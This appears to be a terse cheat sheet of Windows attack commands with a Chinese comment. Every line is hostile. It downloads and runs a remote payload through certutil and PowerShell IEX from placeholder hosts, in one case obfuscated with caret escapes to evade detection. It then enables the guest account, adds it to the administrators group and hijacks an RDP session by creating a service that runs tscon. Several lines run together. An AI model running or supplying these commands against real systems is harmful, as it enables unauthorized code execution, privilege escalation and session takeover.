certutil.exe -urlcache -split -f http://x.x.x.x/x.exe D:\x.exepowershell.exe IEX ((new-objectnet.webclient).downloadstring('http://x.x.x.x/x'))
echo I^E^X ((new-object net.webclient).d^o^w^n^l^o^a^d^s^t^r^i^n^g('http://0.0.0.0)) | p^o^w^e^r^s^h^e^l^l -net user guest /active:yesnet user guest [email protected]net localgroup administrators guest /add
query usersc create tide binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#4" #1为目标会 话id和当前会话名net start tide